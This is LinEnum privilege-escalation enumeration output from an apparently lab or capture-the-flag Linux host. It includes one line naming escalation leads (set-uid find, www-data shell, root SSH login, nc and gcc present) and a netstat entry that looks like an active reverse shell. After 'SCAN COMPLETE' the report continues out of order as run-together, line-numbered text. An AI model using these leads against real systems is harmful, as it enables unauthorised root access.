-rwxr-xr-x 1 root root 42748 Apr 16 2013 /usr/sbin/acpid
lrwxrwxrwx 1 root root 34 May 30 2018 /usr/sbin/apache2 -> ../lib/apache2/mpm-prefork/apache2
-rwxr-xr-x 1 root root 21812 Oct 4 2014 /usr/sbin/atd
-rwxr-xr-x 1 root root 43020 Jul 4 2012 /usr/sbin/cron
-rwsr-xr-x 1 root root 937564 Feb 11 2018 /usr/sbin/exim4
-rwxr-xr-x 1 root root 10585256 Apr 20 2018 /usr/sbin/mysqld
-rwxr-xr-x 1 root root 28832 May 22 2013 /usr/sbin/rpc.idmapd
-rwxr-xr-x 1 root root 388200 Oct 8 2014 /usr/sbin/rsyslogd
-rwxr-xr-x 1 root root 531888 Jan 27 2018 /usr/sbin/sshd

[-] /etc/init.d/ binary permissions:
total 280
drwxr-xr-x 2 root root 4096 Feb 19 23:01 .
drwxr-xr-x 85 root root 4096 May 7 00:08 ..
-rw-r--r-- 1 root root 1586 Feb 19 23:02 .depend.boot
-rw-r--r-- 1 root root 669 Feb 19 23:02 .depend.start
-rw-r--r-- 1 root root 769 Feb 19 23:02 .depend.stop
-rw-r--r-- 1 root root 2427 Oct 16 2012 README
-rwxr-xr-x 1 root root 2227 Apr 16 2013 acpid
-rwxr-xr-x 1 root root 7820 May 26 2018 apache2
-rwxr-xr-x 1 root root 1071 Jun 25 2011 atd
-rwxr-xr-x 1 root root 1276 Oct 16 2012 bootlogs
-rwxr-xr-x 1 root root 1281 Jul 15 2013 bootmisc.sh
-rwxr-xr-x 1 root root 3816 Jul 15 2013 checkfs.sh
-rwxr-xr-x 1 root root 1099 Jul 15 2013 checkroot-bootclean.sh
-rwxr-xr-x 1 root root 9673 Jul 15 2013 checkroot.sh
-rwxr-xr-x 1 root root 1379 Dec 9 2011 console-setup
-rwxr-xr-x 1 root root 3033 Jul 3 2012 cron
-rwxr-xr-x 1 root root 2813 Feb 6 2015 dbus
-rwxr-xr-x 1 root root 6435 Feb 11 2018 exim4
-rwxr-xr-x 1 root root 1329 Oct 16 2012 halt
-rwxr-xr-x 1 root root 1423 Oct 16 2012 hostname.sh
-rwxr-xr-x 1 root root 3880 Dec 10 2012 hwclock.sh
-rwxr-xr-x 1 root root 7592 Apr 28 2012 kbd
-rwxr-xr-x 1 root root 1591 Oct 1 2012 keyboard-setup
-rwxr-xr-x 1 root root 1293 Oct 16 2012 killprocs
-rwxr-xr-x 1 root root 1990 May 21 2012 kmod
-rwxr-xr-x 1 root root 2405 Sep 26 2016 mcstrans
-rwxr-xr-x 1 root root 995 Oct 16 2012 motd
-rwxr-xr-x 1 root root 670 Feb 24 2013 mountall-bootclean.sh
-rwxr-xr-x 1 root root 2128 Feb 24 2013 mountall.sh
-rwxr-xr-x 1 root root 1508 Jul 15 2013 mountdevsubfs.sh
-rwxr-xr-x 1 root root 1413 Jul 15 2013 mountkernfs.sh
-rwxr-xr-x 1 root root 678 Feb 24 2013 mountnfs-bootclean.sh
-rwxr-xr-x 1 root root 2440 Oct 16 2012 mountnfs.sh
-rwxr-xr-x 1 root root 1731 Jul 15 2013 mtab.sh
-rwxr-xr-x 1 root root 5437 Apr 19 2018 mysql
-rwxr-xr-x 1 root root 4322 Mar 14 2013 networking
-rwxr-xr-x 1 root root 6491 May 22 2013 nfs-common
-rwxr-xr-x 1 root root 1346 May 20 2012 procps
-rwxr-xr-x 1 root root 6120 Oct 16 2012 rc
-rwxr-xr-x 1 root root 782 Oct 16 2012 rc.local
-rwxr-xr-x 1 root root 117 Oct 16 2012 rcS
-rwxr-xr-x 1 root root 639 Oct 16 2012 reboot
-rwxr-xr-x 1 root root 2727 Sep 26 2016 restorecond
-rwxr-xr-x 1 root root 1074 Jul 15 2013 rmnologin
-rwxr-xr-x 1 root root 2344 May 10 2017 rpcbind
-rwxr-xr-x 1 root root 3054 Oct 8 2014 rsyslog
-rwxr-xr-x 1 root root 3200 Oct 16 2012 sendsigs
-rwxr-xr-x 1 root root 590 Oct 16 2012 single
-rw-r--r-- 1 root root 4290 Oct 16 2012 skeleton
-rwxr-xr-x 1 root root 3881 Apr 15 2016 ssh
-rwxr-xr-x 1 root root 8827 Nov 9 2012 udev
-rwxr-xr-x 1 root root 1179 Aug 20 2012 udev-mtab
-rwxr-xr-x 1 root root 2721 Apr 10 2013 umountfs
-rwxr-xr-x 1 root root 2195 Apr 10 2013 umountnfs.sh
-rwxr-xr-x 1 root root 1122 Oct 16 2012 umountroot
-rwxr-xr-x 1 root root 3111 Oct 16 2012 urandom
-rwxr-xr-x 1 root root 1364 Oct 26 2015 virtualbox-guest-utils
-rwxr-xr-x 1 root root 2666 Mar 3 2012 x11-common

[-] /etc/init/ config file permissions:
total 48
drwxr-xr-x 2 root root 4096 Feb 19 22:25 .
drwxr-xr-x 85 root root 4096 May 7 00:08 ..
-rw-r--r-- 1 root root 523 Mar 14 2013 network-interface-container.conf
-rw-r--r-- 1 root root 1603 Mar 14 2013 network-interface-security.conf
-rw-r--r-- 1 root root 803 Mar 14 2013 network-interface.conf
-rw-r--r-- 1 root root 1898 Mar 14 2013 networking.conf
-rw-r--r-- 1 root root 567 Feb 24 2013 startpar-bridge.conf
-rw-r--r-- 1 root root 637 Nov 5 2012 udev-fallback-graphics.conf
-rw-r--r-- 1 root root 769 Nov 5 2012 udev-finish.conf
-rw-r--r-- 1 root root 322 Nov 5 2012 udev.conf
-rw-r--r-- 1 root root 356 Nov 5 2012 udevmonitor.conf
-rw-r--r-- 1 root root 352 Nov 5 2012 udevtrigger.conf

[-] /lib/systemd/* config file permissions:
/lib/systemd/:
total 4.0K
drwxr-xr-x 6 root root 4.0K Feb 19 22:43 system

/lib/systemd/system:
total 56K
drwxr-xr-x 2 root root 4.0K Feb 19 22:43 dbus.target.wants
drwxr-xr-x 2 root root 4.0K Feb 19 22:43 multi-user.target.wants
drwxr-xr-x 2 root root 4.0K Feb 19 22:43 sockets.target.wants
drwxr-xr-x 2 root root 4.0K Feb 19 22:25 basic.target.wants
-rw-r--r-- 1 root root 353 Feb 10 2015 dbus.service
-rw-r--r-- 1 root root 106 Feb 10 2015 dbus.socket
-rw-r--r-- 1 root root 190 Oct 8 2014 rsyslog.service
-rw-r--r-- 1 root root 164 Apr 29 2013 udev-control.socket
-rw-r--r-- 1 root root 177 Apr 29 2013 udev-kernel.socket
-rw-r--r-- 1 root root 752 Apr 29 2013 udev-settle.service
-rw-r--r-- 1 root root 291 Apr 29 2013 udev-trigger.service
-rw-r--r-- 1 root root 384 Apr 29 2013 udev.service
-rw-r--r-- 1 root root 155 Apr 16 2013 acpid.service
-rw-r--r-- 1 root root 115 Apr 16 2013 acpid.socket

/lib/systemd/system/dbus.target.wants:
total 0
lrwxrwxrwx 1 root root 14 Feb 10 2015 dbus.socket -> ../dbus.socket

/lib/systemd/system/multi-user.target.wants:
total 0
lrwxrwxrwx 1 root root 15 Feb 10 2015 dbus.service -> ../dbus.service

/lib/systemd/system/sockets.target.wants:
total 0
lrwxrwxrwx 1 root root 14 Feb 10 2015 dbus.socket -> ../dbus.socket
lrwxrwxrwx 1 root root 22 Apr 29 2013 udev-control.socket -> ../udev-control.socket
lrwxrwxrwx 1 root root 21 Apr 29 2013 udev-kernel.socket -> ../udev-kernel.socket

/lib/systemd/system/basic.target.wants:
total 0
lrwxrwxrwx 1 root root 23 Apr 29 2013 udev-trigger.service -> ../udev-trigger.service
lrwxrwxrwx 1 root root 15 Apr 29 2013 udev.service -> ../udev.service

### SOFTWARE #############################################
[-] MYSQL version:
mysql Ver 14.14 Distrib 5.5.60, for debian-linux-gnu (i686) using readline 6.2

[-] Apache user configuration:
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data

### INTERESTING FILES ####################################
[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/gcc
/usr/bin/curl

[-] Installed compilers:
ii checkpolicy 2.1.8-2 i386 SELinux policy compiler
ii gcc 4:4.7.2-1 i386 GNU C compiler
ii gcc-4.7 4.7.2-5 i386 GNU C compiler
ii gcc-4.7-multilib 4.7.2-5 i386 GNU C compiler (multilib files)
ii gcc-multilib 4:4.7.2-1 i386 GNU C compiler (multilib files)

[-] Can we read/write sensitive files:
-rw-r--r-- 1 root root 1057 Feb 19 23:51 /etc/passwd
-rw-r--r-- 1 root root 612 Feb 19 23:51 /etc/group
-rw-r--r-- 1 root root 851 Jul 30 2011 /etc/profile
-rw-r----- 1 root shadow 870 Feb 28 12:10 /etc/shadow

[-] SUID files:
-rwsr-xr-x 1 root root 88744 Dec 10 2012 /bin/mount
-rwsr-xr-x 1 root root 31104 Apr 13 2011 /bin/ping
-rwsr-xr-x 1 root root 35200 Feb 27 2017 /bin/su
-rwsr-xr-x 1 root root 35252 Apr 13 2011 /bin/ping6
-rwsr-xr-x 1 root root 67704 Dec 10 2012 /bin/umount
-rwsr-sr-x 1 daemon daemon 50652 Oct 4 2014 /usr/bin/at
-rwsr-xr-x 1 root root 35892 Feb 27 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 45396 Feb 27 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 30880 Feb 27 2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 44564 Feb 27 2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 66196 Feb 27 2017 /usr/bin/gpasswd
-rwsr-sr-x 1 root mail 83912 Nov 18 2017 /usr/bin/procmail
-rwsr-xr-x 1 root root 162424 Jan 6 2012 /usr/bin/find
-rwsr-xr-x 1 root root 937564 Feb 11 2018 /usr/sbin/exim4
-rwsr-xr-x 1 root root 9660 Jun 20 2017 /usr/lib/pt_chown
-rwsr-xr-x 1 root root 248036 Jan 27 2018 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 5412 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 321692 Feb 10 2015 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 84532 May 22 2013 /sbin/mount.nfs

[+] Possibly interesting SUID files:
-rwsr-xr-x 1 root root 162424 Jan 6 2012 /usr/bin/find

[-] SGID files:
-rwxr-sr-x 1 root ssh 128396 Jan 27 2018 /usr/bin/ssh-agent
-rwsr-sr-x 1 daemon daemon 50652 Oct 4 2014 /usr/bin/at
-rwxr-sr-x 1 root mlocate 30492 Sep 25 2010 /usr/bin/mlocate
-rwxr-sr-x 1 root mail 17908 Nov 18 2017 /usr/bin/lockfile
-rwxr-sr-x 1 root shadow 49364 Feb 27 2017 /usr/bin/chage
-rwxr-sr-x 1 root tty 9708 Jun 11 2012 /usr/bin/bsd-write
-rwxr-sr-x 1 root mail 9768 Nov 30 2014 /usr/bin/mutt_dotlock
-rwxr-sr-x 1 root tty 18020 Dec 10 2012 /usr/bin/wall
-rwxr-sr-x 1 root crontab 34760 Jul 4 2012 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 18168 Feb 27 2017 /usr/bin/expiry
-rwsr-sr-x 1 root mail 83912 Nov 18 2017 /usr/bin/procmail
-rwxr-sr-x 1 root mail 13960 Dec 12 2012 /usr/bin/dotlockfile
-rwxr-sr-x 1 root utmp 4972 Feb 21 2011 /usr/lib/utempter/utempter
-rwxr-sr-x 1 root shadow 30332 May 5 2012 /sbin/unix_chkpwd

[-] Can't search *.conf files as no keyword was entered
[-] Can't search *.php files as no keyword was entered
[-] Can't search *.log files as no keyword was entered
[-] Can't search *.ini files as no keyword was entered

[-] All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 45 May 7 01:08 /etc/resolv.conf
-rw-r--r-- 1 root root 346 Mar 31 2012 /etc/discover-modprobe.conf
-rw-r--r-- 1 root root 216 Sep 26 2016 /etc/sestatus.conf
-rw-r--r-- 1 root root 1260 May 30 2008 /etc/ucf.conf
-rw-r--r-- 1 root root 834 Jun 8 2012 /etc/gssapi_mech.conf
-rw-r--r-- 1 root root 859 Nov 24 2012 /etc/insserv.conf
-rw-r--r-- 1 root root 144 Feb 19 22:55 /etc/kernel-img.conf
-rw-r--r-- 1 root root 3173 Dec 16 2017 /etc/reportbug.conf
-rw-r--r-- 1 root root 599 Feb 19 2009 /etc/logrotate.conf
-rw-r--r-- 1 root root 6895 Feb 19 22:44 /etc/ca-certificates.conf
-rw-r--r-- 1 root root 284 Sep 25 2010 /etc/updatedb.conf
-rw-r--r-- 1 root root 191 Feb 1 2012 /etc/libaudit.conf
-rw-r--r-- 1 root root 604 May 16 2012 /etc/deluser.conf
-rw-r--r-- 1 root root 2940 Feb 12 2016 /etc/gai.conf
-rw-r--r-- 1 root root 2632 Oct 8 2014 /etc/rsyslog.conf
-rw-r--r-- 1 root root 2082 May 20 2012 /etc/sysctl.conf
-rw-r--r-- 1 root root 214 May 11 2013 /etc/idmapd.conf
-rw-r--r-- 1 root root 956 Feb 22 2015 /etc/mke2fs.conf
-rw-r--r-- 1 root root 552 Apr 30 2012 /etc/pam.conf
-rw-r--r-- 1 root root 2981 Feb 19 22:25 /etc/adduser.conf
-rw-r--r-- 1 root root 2969 Dec 26 2012 /etc/debconf.conf
-rw-r--r-- 1 root root 9 Aug 8 2006 /etc/host.conf
-rw-r--r-- 1 root root 34 Feb 19 22:24 /etc/ld.so.conf
-rw-r--r-- 1 root root 475 Aug 29 2006 /etc/nsswitch.conf

[-] Location and contents (if accessible) of .bash_history file(s):
/home/flag4/.bash_history
cd
ls
vi flag4.txt
ls
exit

[-] Any interesting mail in /var/mail:
total 8
drwxrwsr-x 2 root mail 4096 Feb 19 22:24 .
drwxr-xr-x 12 root root 4096 Feb 19 23:10 ..

### SCAN COMPLETE ####################################

The parts of this report that matter for escalation: the shell is www-data; /usr/bin/find is set-uid root, which is not a stock Debian setting and is what LinEnum flags under "Possibly interesting SUID files"; mysqld runs as the mysql user, so the UDF route cannot reach root; PermitRootLogin is yes; and gcc, nc, wget and curl are all on the box.
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh 780 libuuid:x:100:101::/var/lib/libuuid:/bin/sh 781 Debian-exim:x:101:104::/var/spool/exim4:/bin/false 782 statd:x:102:65534::/var/lib/nfs:/bin/false 783 messagebus:x:103:107::/var/run/dbus:/bin/false 784 sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin 785 mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false 786 flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash 787 788 789 [00;31m[-] Super user account(s):[00m 790 root 791 792 793 [00;31m[-] Are permissions on /home directories lax:[00m 794 total 12K 795 drwxr-xr-x 3 root root 4.0K Feb 19 23:51 . 796 drwxr-xr-x 23 root root 4.0K Feb 19 22:34 .. 797 drwxr-xr-x 2 flag4 flag4 4.0K Feb 19 23:28 flag4 798 799 800 [00;31m[-] Root is allowed to login via SSH:[00m 801 PermitRootLogin yes 802 803 804 [00;33m### ENVIRONMENTAL #######################################[00m 805 [00;31m[-] Environment information:[00m 806 APACHE_PID_FILE=/var/run/apache2.pid 807 APACHE_RUN_USER=www-data 808 APACHE_LOG_DIR=/var/log/apache2 809 PATH=/usr/local/bin:/usr/bin:/bin 810 PWD=/var/www 811 APACHE_RUN_GROUP=www-data 812 LANG=C 813 SHLVL=1 814 APACHE_LOCK_DIR=/var/lock/apache2 815 APACHE_RUN_DIR=/var/run/apache2 816 _=/usr/bin/env 817 818 819 [00;31m[-] Path information:[00m 820 /usr/local/bin:/usr/bin:/bin 821 822 823 [00;31m[-] Available shells:[00m 824 # /etc/shells: valid login shells 825 /bin/sh 826 /bin/dash 827 /bin/bash 828 /bin/rbash 829 830 831 [00;31m[-] Current umask value:[00m 832 0022 833 u=rwx,g=rx,o=rx 834 835 836 [00;31m[-] umask value as specified in /etc/login.defs:[00m 837 UMASK 022 838 839 840 [00;31m[-] Password and storage information:[00m 841 PASS_MAX_DAYS 99999 842 PASS_MIN_DAYS 0 843 PASS_WARN_AGE 7 844 ENCRYPT_METHOD SHA512 845 846 847 [00;33m### JOBS/TASKS ##########################################[00m 848 [00;31m[-] Cron jobs:[00m 849 -rw-r--r-- 1 root root 722 Jul 4 2012 /etc/crontab 850 851 /etc/cron.d: 852 total 16 853 drwxr-xr-x 2 root root 4096 Feb 19 23:01 
. 854 drwxr-xr-x 85 root root 4096 May 7 01:08 .. 855 -rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder 856 -rw-r--r-- 1 root root 510 May 10 2018 php5 857 858 /etc/cron.daily: 859 total 68 860 drwxr-xr-x 2 root root 4096 Feb 19 23:01 . 861 drwxr-xr-x 85 root root 4096 May 7 01:08 .. 862 -rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder 863 -rwxr-xr-x 1 root root 633 May 30 2018 apache2 864 -rwxr-xr-x 1 root root 14985 Oct 24 2014 apt 865 -rwxr-xr-x 1 root root 314 Nov 5 2012 aptitude 866 -rwxr-xr-x 1 root root 355 Jun 11 2012 bsdmainutils 867 -rwxr-xr-x 1 root root 256 May 3 2016 dpkg 868 -rwxr-xr-x 1 root root 4125 Feb 11 2018 exim4-base 869 -rwxr-xr-x 1 root root 89 May 17 2012 logrotate 870 -rwxr-xr-x 1 root root 1365 Jun 19 2012 man-db 871 -rwxr-xr-x 1 root root 606 Sep 25 2010 mlocate 872 -rwxr-xr-x 1 root root 249 May 26 2012 passwd 873 874 /etc/cron.hourly: 875 total 12 876 drwxr-xr-x 2 root root 4096 Feb 19 22:25 . 877 drwxr-xr-x 85 root root 4096 May 7 01:08 .. 878 -rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder 879 880 /etc/cron.monthly: 881 total 12 882 drwxr-xr-x 2 root root 4096 Feb 19 22:25 . 883 drwxr-xr-x 85 root root 4096 May 7 01:08 .. 884 -rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder 885 886 /etc/cron.weekly: 887 total 16 888 drwxr-xr-x 2 root root 4096 Feb 19 22:25 . 889 drwxr-xr-x 85 root root 4096 May 7 01:08 .. 890 -rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder 891 -rwxr-xr-x 1 root root 907 Jun 19 2012 man-db 892 893 894 [00;31m[-] Crontab contents:[00m 895 # /etc/crontab: system-wide crontab 896 # Unlike any other crontab you don't have to run the `crontab' 897 # command to install the new version when you edit this file 898 # and files in /etc/cron.d. These files also have username fields, 899 # that none of the other crontabs do. 
900 901 SHELL=/bin/sh 902 PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin 903 904 # m h dom mon dow user command 905 17 * * * * root cd / && run-parts --report /etc/cron.hourly 906 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 907 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 908 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) 909 # 910 911 912 [00;33m### NETWORKING ##########################################[00m 913 [00;31m[-] Network and IP info:[00m 914 eth0 Link encap:Ethernet HWaddr 00:0c:29:d1:f4:98 915 inet addr:192.168.16.107 Bcast:192.168.16.255 Mask:255.255.255.0 916 inet6 addr: fe80::20c:29ff:fed1:f498/64 Scope:Link 917 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 918 RX packets:8711 errors:0 dropped:0 overruns:0 frame:0 919 TX packets:3014 errors:0 dropped:0 overruns:0 carrier:0 920 collisions:0 txqueuelen:1000 921 RX bytes:1327204 (1.2 MiB) TX bytes:1104845 (1.0 MiB) 922 923 lo Link encap:Local Loopback 924 inet addr:127.0.0.1 Mask:255.0.0.0 925 inet6 addr: ::1/128 Scope:Host 926 UP LOOPBACK RUNNING MTU:16436 Metric:1 927 RX packets:50 errors:0 dropped:0 overruns:0 frame:0 928 TX packets:50 errors:0 dropped:0 overruns:0 carrier:0 929 collisions:0 txqueuelen:0 930 RX bytes:4852 (4.7 KiB) TX bytes:4852 (4.7 KiB) 931 932 933 [00;31m[-] ARP history:[00m 934 192.168.16.112 dev eth0 INCOMPLETE 935 936 937 [00;31m[-] Nameserver(s):[00m 938 nameserver 192.168.16.254 939 nameserver 0.0.0.0 940 941 942 [00;31m[-] Default route:[00m 943 default via 192.168.16.254 dev eth0 944 945 946 [00;31m[-] Listening TCP:[00m 947 Active Internet connections (servers and established) 948 Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name 949 tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - 950 tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN - 951 tcp 0 0 0.0.0.0:40858 0.0.0.0:* LISTEN - 952 tcp 0 0 127.0.0.1:3306 
0.0.0.0:* LISTEN - 953 tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN - 954 tcp 0 480 192.168.16.107:33469 192.168.16.112:4444 ESTABLISHED 3406/php 955 tcp6 0 0 :::22 :::* LISTEN - 956 tcp6 0 0 ::1:25 :::* LISTEN - 957 tcp6 0 0 :::34190 :::* LISTEN - 958 tcp6 0 0 :::111 :::* LISTEN - 959 tcp6 0 0 :::80 :::* LISTEN - 960 tcp6 0 0 192.168.16.107:80 192.168.16.112:52090 TIME_WAIT - 961 tcp6 1 0 192.168.16.107:80 192.168.16.112:63539 CLOSE_WAIT - 962 963 964 [00;31m[-] Listening UDP:[00m 965 Active Internet connections (servers and established) 966 Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name 967 udp 0 0 0.0.0.0:59942 0.0.0.0:* - 968 udp 0 0 0.0.0.0:68 0.0.0.0:* - 969 udp 0 0 0.0.0.0:111 0.0.0.0:* - 970 udp 0 0 0.0.0.0:769 0.0.0.0:* - 971 udp 0 0 127.0.0.1:801 0.0.0.0:* - 972 udp 0 0 0.0.0.0:21881 0.0.0.0:* - 973 udp6 0 0 :::52815 :::* - 974 udp6 0 0 :::28256 :::* - 975 udp6 0 0 :::111 :::* - 976 udp6 0 0 :::769 :::* - 977 978 979 [00;33m### SERVICES #############################################[00m 980 [00;31m[-] Running processes:[00m 981 USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND 982 root 1 0.0 0.0 2296 780 ? Ss 00:08 0:01 init [2] 983 root 2 0.0 0.0 0 0 ? S 00:08 0:00 [kthreadd] 984 root 3 0.0 0.0 0 0 ? S 00:08 0:00 [ksoftirqd/0] 985 root 4 0.0 0.0 0 0 ? S 00:08 0:00 [kworker/0:0] 986 root 6 0.0 0.0 0 0 ? S 00:08 0:00 [watchdog/0] 987 root 7 0.0 0.0 0 0 ? S< 00:08 0:00 [cpuset] 988 root 8 0.0 0.0 0 0 ? S< 00:08 0:00 [khelper] 989 root 9 0.0 0.0 0 0 ? S 00:08 0:00 [kdevtmpfs] 990 root 10 0.0 0.0 0 0 ? S< 00:08 0:00 [netns] 991 root 11 0.0 0.0 0 0 ? S 00:08 0:00 [sync_supers] 992 root 12 0.0 0.0 0 0 ? S 00:08 0:00 [bdi-default] 993 root 13 0.0 0.0 0 0 ? S< 00:08 0:00 [kintegrityd] 994 root 14 0.0 0.0 0 0 ? S< 00:08 0:00 [kblockd] 995 root 15 0.0 0.0 0 0 ? S 00:08 0:00 [khungtaskd] 996 root 16 0.0 0.0 0 0 ? S 00:08 0:00 [kswapd0] 997 root 17 0.0 0.0 0 0 ? SN 00:08 0:00 [ksmd] 998 root 18 0.0 0.0 0 0 ? 
S 00:08 0:00 [fsnotify_mark] 999 root 19 0.0 0.0 0 0 ? S< 00:08 0:00 [crypto] 1000 root 95 0.0 0.0 0 0 ? S 00:08 0:00 [khubd] 1001 root 105 0.0 0.0 0 0 ? S< 00:08 0:00 [ata_sff] 1002 root 115 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_0] 1003 root 125 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_1] 1004 root 134 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_2] 1005 root 135 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_3] 1006 root 136 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_4] 1007 root 137 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_5] 1008 root 138 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_6] 1009 root 139 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_7] 1010 root 140 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_8] 1011 root 141 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_9] 1012 root 142 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_10] 1013 root 143 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_11] 1014 root 144 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_12] 1015 root 145 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_13] 1016 root 146 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_14] 1017 root 147 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_15] 1018 root 148 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_16] 1019 root 149 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_17] 1020 root 150 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_18] 1021 root 151 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_19] 1022 root 152 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_20] 1023 root 153 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_21] 1024 root 154 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_22] 1025 root 155 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_23] 1026 root 156 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_24] 1027 root 157 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_25] 1028 root 158 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_26] 1029 root 159 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_27] 1030 root 160 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_28] 1031 root 161 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_29] 1032 root 162 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_30] 1033 root 163 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_31] 1034 root 190 0.0 0.0 0 0 ? S 00:08 0:00 [kworker/u:29] 1035 root 191 0.0 0.0 0 0 ? 
S 00:08 0:00 [kworker/u:30] 1036 root 308 0.0 0.0 0 0 ? S 00:08 0:00 [jbd2/sda1-8] 1037 root 309 0.0 0.0 0 0 ? S< 00:08 0:00 [ext4-dio-unwrit] 1038 root 458 0.0 0.1 2688 1244 ? Ss 00:08 0:00 udevd --daemon 1039 root 543 0.0 0.0 0 0 ? S< 00:08 0:00 [ttm_swap] 1040 root 699 0.0 0.0 0 0 ? S< 00:08 0:00 [kpsmoused] 1041 root 1866 0.0 0.0 2388 904 ? Ss 00:08 0:00 /sbin/rpcbind -w 1042 statd 1897 0.0 0.1 2660 1280 ? Ss 00:08 0:00 /sbin/rpc.statd 1043 root 1902 0.0 0.0 2684 888 ? S 00:08 0:00 udevd --daemon 1044 root 1903 0.0 0.0 0 0 ? S< 00:08 0:00 [rpciod] 1045 root 1905 0.0 0.0 0 0 ? S< 00:08 0:00 [nfsiod] 1046 root 1912 0.0 0.0 2592 568 ? Ss 00:08 0:00 /usr/sbin/rpc.idmapd 1047 root 2215 0.0 0.2 28352 2080 ? Sl 00:08 0:00 /usr/sbin/rsyslogd -c5 1048 root 2267 0.0 0.0 1892 608 ? Ss 00:08 0:00 /usr/sbin/acpid 1049 root 2303 0.0 0.8 43680 8928 ? Ss 00:08 0:00 /usr/sbin/apache2 -k start 1050 daemon 2347 0.0 0.0 2168 316 ? Ss 00:08 0:00 /usr/sbin/atd 1051 103 2353 0.0 0.0 3032 644 ? Ss 00:08 0:00 /usr/bin/dbus-daemon --system 1052 www-data 2381 0.0 1.3 48448 14420 ? S 00:08 0:00 /usr/sbin/apache2 -k start 1053 www-data 2382 0.0 1.2 47424 13408 ? S 00:08 0:00 /usr/sbin/apache2 -k start 1054 www-data 2383 0.0 1.4 47676 14836 ? S 00:08 0:01 /usr/sbin/apache2 -k start 1055 www-data 2384 0.0 1.1 46148 12080 ? S 00:08 0:00 /usr/sbin/apache2 -k start 1056 root 2438 0.0 0.0 3852 988 ? Ss 00:08 0:00 /usr/sbin/cron 1057 root 2493 0.0 0.0 1948 588 ? S 00:08 0:00 /bin/sh /usr/bin/mysqld_safe 1058 mysql 2831 0.0 4.7 329380 49184 ? Sl 00:08 0:02 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306 1059 root 2832 0.0 0.0 1868 604 ? S 00:08 0:00 logger -t mysqld -p daemon.error 1060 101 3228 0.0 0.0 7424 992 ? 
